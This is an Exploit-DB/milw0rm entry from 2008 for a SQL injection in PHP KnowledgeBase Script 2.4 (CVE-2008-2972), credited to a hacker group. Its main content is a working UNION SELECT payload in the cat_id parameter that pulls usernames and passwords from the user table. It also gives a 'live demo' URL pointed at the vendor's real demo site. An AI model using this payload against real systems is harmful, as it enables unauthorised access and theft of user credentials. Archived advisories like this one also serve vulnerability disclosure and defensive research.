PHP KnowledgeBase Script 2.4 cat_id SQL Injection Vulnerability

2008-06-21T00:00:00
ID EDB-ID:5883
Type exploitdb
Reporter S.L TEAM
Modified 2008-06-21T00:00:00

Description

PHP KnowledgeBase Script 2.4 (cat_id) SQL Injection Vulnerability. CVE-2008-2972. Webapps exploit for php platform

                                        
                                            #########################################################################
#################### PROUD TO BE MUSLIM ##############################
##
## Remote SQL Injection Vulnerability
##
## Knowledge Base Software Overview  ( index.php cat_id )
##
#########################################################################
#########################################################################
##
## AuTh0r : S.L TEAM     ( FA6@L 3RROR  --- H3B@R13H)
##
## H0ME   : WwW.MALAKSOFT.CoM 

########################
########################
##
## Script  : Knowledge Base Software Overview
##
## site    : www.kblance.com
##
########################
########################
 ## -(:: SQL ::)-

##    www.site.com/
##          index.php?main=comment&sub=index&view=&qid=3&cat_id=-3+union+select+1,concat_ws(0x3a3a,uname,pwd),3,4,5,6,7,8,9,10+from+user/*
##
##  -(:: L!VE DEMO ::)-
##
##    http://www.kblance.com/demo/index.php?main=comment&sub=index&view=&qid=3&cat_id=-3+union+select+1,concat_ws(0x3a3a,uname,pwd),3,4,5,6,7,8,9,10+from+user/*
#######################################################################################################
#######################################################################################################
 
                                  -(:: !greetz! ::)-
 
 :: MR.SQL   :: BLACK CHEETAH :: GERMAYA-X ::  :: MusliMs HaCkErs ::
#######################################################################################################
#######################################################################################################

# milw0rm.com [2008-06-21]